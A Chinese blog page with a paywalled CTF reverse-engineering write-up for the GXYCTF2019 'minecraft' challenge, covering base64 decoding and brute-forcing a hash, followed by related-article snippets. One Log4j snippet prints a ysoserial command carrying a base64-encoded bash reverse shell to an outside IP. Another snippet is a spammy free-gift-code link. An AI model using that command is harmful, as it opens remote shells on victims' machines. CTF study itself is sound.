BUUCTF [GXYCTF2019]minecraft

最新推荐文章于 2024-06-23 21:10:00 发布
最新推荐文章于 2024-06-23 21:10:00 发布
阅读量1.1k 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: BUUCTF 文章标签: visual studio ide visualstudio
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53349587/article/details/122347542

1.拿到文件,一共有exe文件和dll文件、lib文件三个文件

dll文件和lib文件不知道有什么用,所以先IDA打开exe文件:

里面有一个关键的函数String_to_long,对应的加密过程是在动态链接库里,所以我们用IDA打开dll文件,找到String_to_long这个函数:

第64行有一个"-------Checking-----",我们运行应用程序输入之后也会出现这个字符串,这也更加证实了这个函数为主函数。

2.分析函数:

 首先,我们知道a1是我们的输入,只需要分析对a1进行操作的函数,大致流程就是对我们输入的字符串先进行base64解密,然后每四个字符为一组,进行hash加密,与已知的值进行比较。

看一下hash函数:

 四个字符依次进入循环,综上,把上图的C语言复制粘贴,修改一下,然后爆破即可得到flag,写出爆破脚本:

#include<stdio.h> //编译预处
最低0.47元/天 解锁文章

200万优质内容无限畅学
[GXYCTF2019]minecraft
qq_37439229的博客
04-14 1415
*俺必须承认这道题出的蛮难的。。。。*它居然把主要程序放在他自己编写的dll里,不得不说还是蛮稀奇 首先打开ida 他说给了这个提示(有个屁用呀!!!!!!!!!!!!!!!!!!!!!,还不是要看它源码怎么写的) 调试进入string_t0_long这函数(当然也可以去看它的dll文件,反正都一样,我不过是喜欢看调试) 调试易得前面那一坨,只是进行了base64加密,这里就不演示了 同上易得,他...
青少年CTF-A1-Misc-MC大挑战01
m0_74866126的博客
11-17 665
在网上冲浪没找到这题的答案,无奈只有自己试试了,花了很多的时间对压缩包解压的文件进行搜索flag痕迹,但是没有有用的线索,所以做这个可不是直接能从出题人给的文件里找到flag。
[ACTF新生赛2020]Splendid_MineCraft 题解
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
03-15 773
buuctf-[ACTF新生赛2020]Splendid_MineCraft 题解
【Log4j2】VNCTF2022 misc-minecraft log4j反弹shell复现
qq_33834637的博客
04-25 4378
##POC hint mc的flag在/flag Misc mc :hint log4j jdk8u261 commons-collections-3.2.1.jar 使用ysoserial.jar生成反序列化数据 java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8yMDkuMTQxLjMyLjc3LzIzMjIzIDA+JjE=}|{base6
[NKCTF2024] Minecraft:SEED WriteUp by MiguoQAQ
2301_76328911的博客
03-29 542
minecraft环境配置及题目讲解(
minecraft资源包合集
04-07
《我的世界》(Minecraft)是一款备受欢迎的沙盒建造游戏,其丰富的可玩性和无限的创造潜力吸引了全球大量的玩家。资源包是《我的世界》中的一个重要组成部分,它允许玩家自定义游戏的视觉效果,包括纹理、音乐、...
minecraft-packet-debugger:用于捕获 Minecraft 数据包的实用程序
08-03
用于捕获 Minecraft 数据包的实用程序 如何使用? 下载最新(点击) 提取存档 安装包npm install 运行本地 Minecraft 服务器 重要的! 本地服务器的版本必须与您要连接的真实服务器的版本匹配 运行node index ...
minecraft-server-status:用于检查Minecraft服务器状态PHP库
02-04
该库可用于检查Minecraft服务器状态以获取一些基本信息。 :warning: 当您无法从服务器检索信息时,请勿创建问题,除非您可以证明库中存在错误。 Ping和查询之间的区别 有两种检索有关Minecraft服务器的信息的方法...
easy_nbt(CTF杂项题MISC)
qq_45215609的博客
03-12 576
easy_nbt(CTF杂项题MISC)
我的世界Java版兑换
最新发布
Desktop_explorer的博客
06-23 298
Time to upgrade my Minecraft to premium https://freeminecraftgiftcode.net :D
Bugku:easy_nbt
WM0723的博客
03-23 485
Bugku:easy_nbt
CTF-Bugku-MISC-30
hahaHalsey的博客
09-08 1880
Bugku 杂项30道
[GXYCTF2019]禁止套娃
qq_42812036的博客
02-20 3743
0x00知识点 .git源码泄露 无参RCE localeconv() 函数返回一包含本地数字及货币格式信息的数组。 scandir() 列出 images 目录中的文件和目录。 readfile() 输出一个文件。 current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 next() 函数将内部指针指向数组中的下一个元素,并输出。 array...
[buuctf.reverse] 126-130
weixin_52640415的博客
06-26 806
126_[NPUCTF2020]EzObfus-Chapter2 128_[GKCTF 2021]app-debug 129_[FlareOn2]YUSoMeta 130_[GXYCTF2019]minecraft
spring学习(二 )aop
qq_37439229的博客
07-12 216
spring中基于aop的配置步骤 1.把通知bean交给spring管理 2.使用aop:config标签开始aop配置 3,使用aspect配置切面(id标志 ref通知类bean的id) 4.在aspect内部使用对应标签来配置通知类型(AOP:before method) 5.pointcut表示指定切入点表达式 写法: 关键字:execution 表达式: 访问修饰符 包明。。。类名。方法名 public void com.spring_learn,..... 全通配写法:* *..*.*(..)
buuctf Crackme6
qq_37439229的博客
05-16 789
这道题涉及的知识点说实话还是蛮多的。。。 首先是这里的加密 主要是看汇编,不难,yafu一下知道是[2,3,5,7,11,13,17,19,23] a = [2 , 3, 5, 7, 11 ,13,17,19,23] b = [0x33,0x21,0x22,0x21,0x35,0x7c,0x62,0x65,0x6e] for i in range(9): a[i] = a[i] +0x41 a[i] = a[i] ^b[i] "".join(chr(a[i]) for i in rang
GXYCTF2019 Writeup
qq_39642801的博客
12-26 1096
网上找了以下发现要找到writeup还是有些困难,码以下,比较友好的比赛。 writeup地址:https://15h3na0.xyz/2019/12/21/GXYCTF%20Writeup/?from=groupmessage&nsukey=lzvye6q%2FD%2Fd73PbgxMqA3t1DxnjpUe3yTT3gztom9yvT6aHP8oyN%2BWwMu6eAIJLKkr05...
ctf镜子里面的世界_我的世界:游戏为什么没有镜子,因为技术原因,mojang做不出来?...
weixin_39853155的博客
11-09 584
大家都知道,我的世界这款游戏可以说是非常的有趣了,在这款游戏之中,玩家们可以随意的搭建自己想要的内容,甚至是可以随意还原现实之中的很多内容,而在这款游戏当中,也有很多道具是和现实一模一样的。但是大家发现了没有,在我的世界之中,玩家们一直都没有镜子这种东西,没法在每天出门的时候照镜子,那么今天我们就来聊一下,为什么游戏中没有镜子呢?如果让小黄象自己去想的话,那么我给出的答案的话,可能就是有...
[ACTF新生赛2020]Splendid_MineCraft
m0_46296905的博客
04-22 1099
题目:[ACTF新生赛2020]Splendid_MineCraft 32位无壳程序 初步静态分析 老样子,ida32进去看主函数。 有提示输入错误的字串,但没有提示输入正确的字串。 瞄了一眼流程图(发现有个突出的独立分支),引起了我的怀疑。 红框部分的细节如下: 原来那个提示正确的字串在这个独立分支上,光标放在红框,再按tab看伪代码,发现显示在主函数的这个区域。 在这个区域我们又找到意想不到的收获。 推测是smc没错了。 接下来具体分析主函数: strtok函数: 函数原型:char *
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值